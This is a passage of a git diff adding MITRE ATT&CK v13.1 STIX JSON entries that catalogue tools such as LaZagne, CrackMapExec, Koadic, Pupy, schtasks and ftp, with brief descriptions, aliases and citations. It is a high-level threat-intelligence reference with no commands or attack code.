"Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019." + }, + { + "source_name": "FireEye APT39 Jan 2019", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019." + } + ], + "modified": "2021-04-24T20:45:08.323Z", + "name": "NBTscan", + "description": "[NBTscan](https://attack.mitre.org/software/S0590) is an open source tool that has been used by state groups to conduct internal reconnaissance within a compromised network.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)(Citation: Symantec Waterbug Jun 2019)(Citation: FireEye APT39 Jan 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b76b2d94-60e4-4107-a903-4a3a7622fb3b.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b76b2d94-60e4-4107-a903-4a3a7622fb3b.json new file mode 100644 index 0000000000000000000000000000000000000000..70b1e7ab812bfb588cd2b7ba3cf60d4dc27ab2e7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b76b2d94-60e4-4107-a903-4a3a7622fb3b.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--1282315f-c349-4313-9050-de4514292a99", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-02T20:48:02.590Z", + "name": "LaZagne", + "description": "[LaZagne](https://attack.mitre.org/software/S0349) is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. [LaZagne](https://attack.mitre.org/software/S0349) is publicly available on GitHub.(Citation: GitHub LaZagne Dec 2018)", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.4", + "x_mitre_aliases": [ + "LaZagne" + ], + "type": "tool", + "id": "tool--b76b2d94-60e4-4107-a903-4a3a7622fb3b", + "created": "2019-01-30T16:44:59.887Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0349", + "external_id": "S0349" + }, + { + "source_name": "LaZagne", + "description": "(Citation: GitHub LaZange Dec 2018)" + }, + { + "source_name": "GitHub LaZagne Dec 2018", + "description": "Zanni, A. (n.d.). The LaZagne Project !!!. Retrieved December 14, 2018.", + "url": "https://github.com/AlessandroZ/LaZagne" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b77b563c-34bb-4fb8-86a3-3694338f7b47.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b77b563c-34bb-4fb8-86a3-3694338f7b47.json new file mode 100644 index 0000000000000000000000000000000000000000..389193b1bc8a73fe863f5658888499a7f601f098 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b77b563c-34bb-4fb8-86a3-3694338f7b47.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--89882108-8aa1-4720-a391-f66b7e90019b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-01-04T21:59:04.229Z", + "name": "Ping", + "description": "[Ping](https://attack.mitre.org/software/S0097) is an operating system utility commonly used to troubleshoot and verify network connections. (Citation: TechNet Ping)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_aliases": [ + "Ping" + ], + "type": "tool", + "id": "tool--b77b563c-34bb-4fb8-86a3-3694338f7b47", + "created": "2017-05-31T21:33:01.483Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0097", + "external_id": "S0097" + }, + { + "source_name": "TechNet Ping", + "description": "Microsoft. (n.d.). Ping. Retrieved April 8, 2016.", + "url": "https://technet.microsoft.com/en-us/library/bb490968.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--bba595da-b73a-4354-aa6c-224d4de7cb4e.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--bba595da-b73a-4354-aa6c-224d4de7cb4e.json new file mode 100644 index 0000000000000000000000000000000000000000..7090a0b47dcd2055d105be58c7ba57e9107ffc90 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--bba595da-b73a-4354-aa6c-224d4de7cb4e.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--68817bfd-e12b-429a-9d70-778dbcc19737", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-13T20:24:11.194Z", + "name": "cmd", + "description": "[cmd](https://attack.mitre.org/software/S0106) is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. (Citation: TechNet Cmd)\n\nCmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., dir (Citation: TechNet Dir)), deleting files (e.g., del (Citation: TechNet Del)), and copying files (e.g., copy (Citation: TechNet Copy)).", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "cmd", + "cmd.exe" + ], + "type": "tool", + "id": "tool--bba595da-b73a-4354-aa6c-224d4de7cb4e", + "created": "2017-05-31T21:33:05.319Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0106", + "external_id": "S0106" + }, + { + "source_name": "TechNet Cmd", + "description": "Microsoft. (n.d.). Cmd. Retrieved April 18, 2016.", + "url": "https://technet.microsoft.com/en-us/library/bb490880.aspx" + }, + { + "source_name": "TechNet Copy", + "description": "Microsoft. (n.d.). Copy. Retrieved April 26, 2016.", + "url": "https://technet.microsoft.com/en-us/library/bb490886.aspx" + }, + { + "source_name": "TechNet Del", + "description": "Microsoft. (n.d.). Del. Retrieved April 22, 2016.", + "url": "https://technet.microsoft.com/en-us/library/cc771049.aspx" + }, + { + "source_name": "TechNet Dir", + "description": "Microsoft. (n.d.). Dir. Retrieved April 18, 2016.", + "url": "https://technet.microsoft.com/en-us/library/cc755121.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c11ac61d-50f4-444f-85d8-6f006067f0de.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c11ac61d-50f4-444f-85d8-6f006067f0de.json new file mode 100644 index 0000000000000000000000000000000000000000..cd0f1a8c658d76051ba5b4c773f4375645a2964e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c11ac61d-50f4-444f-85d8-6f006067f0de.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--8400d676-c124-4f6f-a4f0-d8b6f8ad6c60", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "tool", + "id": "tool--c11ac61d-50f4-444f-85d8-6f006067f0de", + "created": "2017-05-31T21:33:04.151Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0103", + "url": "https://attack.mitre.org/software/S0103" + }, + { + "source_name": "TechNet Route", + "url": "https://technet.microsoft.com/en-us/library/bb490991.aspx", + "description": "Microsoft. (n.d.). Route. Retrieved April 17, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[route](https://attack.mitre.org/software/S0103) can be used to find or change information within the local system IP routing table. (Citation: TechNet Route)", + "modified": "2022-04-06T15:27:00.668Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "route", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c256da91-6dd5-40b2-beeb-ee3b22ab3d27.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c256da91-6dd5-40b2-beeb-ee3b22ab3d27.json new file mode 100644 index 0000000000000000000000000000000000000000..70848ca792d1dfead94405d6cd1d62a1cd494350 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c256da91-6dd5-40b2-beeb-ee3b22ab3d27.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--cf65dbdb-dba5-4e3f-b175-6aad12643ce8", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Edward Millington", + "Matthew Demaske, Adaptforward" + ], + "x_mitre_aliases": [ + "esentutl", + "esentutl.exe" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--c256da91-6dd5-40b2-beeb-ee3b22ab3d27", + "type": "tool", + "created": "2019-09-03T18:25:36.963Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0404", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0404" + }, + { + "description": "Microsoft. (2016, August 30). Esentutl. Retrieved September 3, 2019.", + "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/hh875546(v=ws.11)", + "source_name": "Microsoft Esentutl" + } + ], + "modified": "2021-10-01T17:48:10.492Z", + "name": "esentutl", + "description": "[esentutl](https://attack.mitre.org/software/S0404) is a command-line tool that provides database utilities for the Windows Extensible Storage Engine.(Citation: Microsoft Esentutl)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c4810609-7da6-48ec-8057-1b70a7814db0.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c4810609-7da6-48ec-8057-1b70a7814db0.json new file mode 100644 index 0000000000000000000000000000000000000000..bba1aaef43236d8a573835799708ba81169f6707 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c4810609-7da6-48ec-8057-1b70a7814db0.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--d7edc188-938d-40bb-9459-e98925f7b1ae", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "CrackMapExec" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "type": "tool", + "created": "2020-07-17T14:23:05.958Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0488", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0488" + }, + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "modified": "2020-07-29T20:19:40.544Z", + "name": "CrackMapExec", + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488), or CME, is a post-exploitation tool developed in Python and designed for penetration testing against networks. [CrackMapExec](https://attack.mitre.org/software/S0488) collects Active Directory information to conduct lateral movement through targeted networks.(Citation: CME Github September 2018)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c8655260-9f4b-44e3-85e1-6538a5f6e4f4.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c8655260-9f4b-44e3-85e1-6538a5f6e4f4.json new file mode 100644 index 0000000000000000000000000000000000000000..910148342d6ec30d4c0c22e456591a4c81e05242 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c8655260-9f4b-44e3-85e1-6538a5f6e4f4.json @@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--218898a5-3656-4ff1-8465-75a314e4d065", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Koadic" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "tool", + "id": "tool--c8655260-9f4b-44e3-85e1-6538a5f6e4f4", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0250", + "url": "https://attack.mitre.org/software/S0250" + }, + { + "source_name": "Koadic", + "description": "(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)" + }, + { + "source_name": "MalwareBytes LazyScripter Feb 2021", + "url": "https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf", + "description": "Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021." + }, + { + "source_name": "Palo Alto Sofacy 06-2018", + "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "description": "Lee, B., Falcone, R. (2018, June 06). Sofacy Group\u2019s Parallel Attacks. Retrieved June 18, 2018." + }, + { + "source_name": "Github Koadic", + "url": "https://github.com/zerosum0x0/koadic", + "description": "Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.(Citation: Github Koadic)(Citation: Palo Alto Sofacy 06-2018)(Citation: MalwareBytes LazyScripter Feb 2021)", + "modified": "2022-04-06T19:32:33.511Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Koadic", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c9703cd3-141c-43a0-a926-380082be5d04.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c9703cd3-141c-43a0-a926-380082be5d04.json new file mode 100644 index 0000000000000000000000000000000000000000..f433b1639fe665158fe3573c3f5fa5f9fe82d9a3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c9703cd3-141c-43a0-a926-380082be5d04.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--5a2fc3d6-fe1f-47ef-b812-f531e75c24ea", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "schtasks", + "schtasks.exe" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "tool", + "id": "tool--c9703cd3-141c-43a0-a926-380082be5d04", + "created": "2017-05-31T21:33:07.218Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0111", + "url": "https://attack.mitre.org/software/S0111" + }, + { + "source_name": "TechNet Schtasks", + "url": "https://technet.microsoft.com/en-us/library/bb490996.aspx", + "description": "Microsoft. (n.d.). Schtasks. Retrieved April 28, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[schtasks](https://attack.mitre.org/software/S0111) is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. (Citation: TechNet Schtasks)", + "modified": "2022-04-20T20:04:22.896Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "schtasks", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c9cd7ec9-40b7-49db-80be-1399eddd9c52.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c9cd7ec9-40b7-49db-80be-1399eddd9c52.json new file mode 100644 index 0000000000000000000000000000000000000000..9c5f03b17a938f483cb438cbb354dacbaf0a31d3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--c9cd7ec9-40b7-49db-80be-1399eddd9c52.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--111a8e22-a211-4847-b1f3-ec1a6841bb18", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Cachedump" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--c9cd7ec9-40b7-49db-80be-1399eddd9c52", + "type": "tool", + "created": "2017-05-31T21:33:10.197Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0119", + "external_id": "S0119" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "modified": "2020-03-30T15:15:36.756Z", + "name": "Cachedump", + "description": "[Cachedump](https://attack.mitre.org/software/S0119) is a publicly-available tool that program extracts cached password hashes from a system\u2019s registry. (Citation: Mandiant APT1)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--ca656c25-44f1-471b-9d9f-e2a3bbb84973.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--ca656c25-44f1-471b-9d9f-e2a3bbb84973.json new file mode 100644 index 0000000000000000000000000000000000000000..1b10e9339c3222378b22e86a9721a3f3b66a746d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--ca656c25-44f1-471b-9d9f-e2a3bbb84973.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--66773990-162a-4de9-89ce-061caf9bdf57", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Matthew Demaske, Adaptforward" + ], + "x_mitre_aliases": [ + "Expand" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--ca656c25-44f1-471b-9d9f-e2a3bbb84973", + "type": "tool", + "created": "2019-02-19T19:17:14.971Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0361", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0361" + }, + { + "source_name": "Microsoft Expand Utility", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/expand", + "description": "Microsoft. (2017, October 15). Expand. Retrieved February 19, 2019." + }, + { + "url": "http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/", + "description": "Lee, B. Grunzweig, J. (2015, December 22). BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger. Retrieved August 19, 2016.", + "source_name": "Palo Alto Networks BBSRAT" + } + ], + "modified": "2020-03-20T18:43:16.989Z", + "name": "Expand", + "description": "[Expand](https://attack.mitre.org/software/S0361) is a Windows utility used to expand one or more compressed CAB files.(Citation: Microsoft Expand Utility) It has been used by [BBSRAT](https://attack.mitre.org/software/S0127) to decompress a CAB file into executable content.(Citation: Palo Alto Networks BBSRAT)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--cb69b20d-56d0-41ab-8440-4a4b251614d4.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--cb69b20d-56d0-41ab-8440-4a4b251614d4.json new file mode 100644 index 0000000000000000000000000000000000000000..8ca43b920d63a832be823b6f1f91797e59871176 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--cb69b20d-56d0-41ab-8440-4a4b251614d4.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--10b9fd72-7c13-4445-a94c-385e0c58a234", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Android" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Pupy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--cb69b20d-56d0-41ab-8440-4a4b251614d4", + "type": "tool", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0192", + "external_id": "S0192" + }, + { + "source_name": "GitHub Pupy", + "description": "Nicolas Verdier. (n.d.). Retrieved January 29, 2018.", + "url": "https://github.com/n1nj4sec/pupy" + } + ], + "modified": "2020-05-13T22:57:00.921Z", + "name": "Pupy", + "description": "[Pupy](https://attack.mitre.org/software/S0192) is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. (Citation: GitHub Pupy) It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). (Citation: GitHub Pupy) [Pupy](https://attack.mitre.org/software/S0192) is publicly available on GitHub. (Citation: GitHub Pupy)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f.json new file mode 100644 index 0000000000000000000000000000000000000000..4ba79a1e82ecc65d79e3ac48018c2286ac3ded00 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--49c7c039-96fd-4438-9977-0b463876ca09", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-13T20:23:35.333Z", + "name": "Reg", + "description": "[Reg](https://attack.mitre.org/software/S0075) is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. (Citation: Microsoft Reg)\n\nUtilities such as [Reg](https://attack.mitre.org/software/S0075) are known to be used by persistent threats. (Citation: Windows Commands JPCERT)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "Reg", + "reg.exe" + ], + "type": "tool", + "id": "tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f", + "created": "2017-05-31T21:32:49.000Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0075", + "external_id": "S0075" + }, + { + "source_name": "Microsoft Reg", + "description": "Microsoft. (2012, April 17). Reg. Retrieved May 1, 2015.", + "url": "https://technet.microsoft.com/en-us/library/cc732643.aspx" + }, + { + "source_name": "Windows Commands JPCERT", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--cf23bf4a-e003-4116-bbae-1ea6c558d565.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--cf23bf4a-e003-4116-bbae-1ea6c558d565.json new file mode 100644 index 0000000000000000000000000000000000000000..cfcd6e05c696ef9f7649103a89e042dbe02261e2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--cf23bf4a-e003-4116-bbae-1ea6c558d565.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--7c04f652-8713-4a25-a499-61db683068c6", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "ftp", + "ftp.exe" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--cf23bf4a-e003-4116-bbae-1ea6c558d565", + "type": "tool", + "created": "2017-05-31T21:33:00.565Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0095", + "external_id": "S0095" + }, + { + "source_name": "Microsoft FTP", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ftp", + "description": "Microsoft. (2021, July 21). ftp. Retrieved February 25, 2022." + }, + { + "source_name": "Linux FTP", + "url": "https://linux.die.net/man/1/ftp", + "description": "N/A. (n.d.). ftp(1) - Linux man page. Retrieved February 25, 2022." + } + ], + "modified": "2022-03-07T22:20:18.809Z", + "name": "ftp", + "description": "[ftp](https://attack.mitre.org/software/S0095) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data.(Citation: Microsoft FTP)(Citation: Linux FTP)", + "x_mitre_version": "2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--d505fc8b-2e64-46eb-96d6-9ef7ffca5b66.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--d505fc8b-2e64-46eb-96d6-9ef7ffca5b66.json new file mode 100644 index 0000000000000000000000000000000000000000..e8ead71b4dd3d2a57d8b1ea8e930a40dff94c3cd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--d505fc8b-2e64-46eb-96d6-9ef7ffca5b66.json @@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--bcddad4e-a10e-46bc-9a51-a51de823d4c8", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + 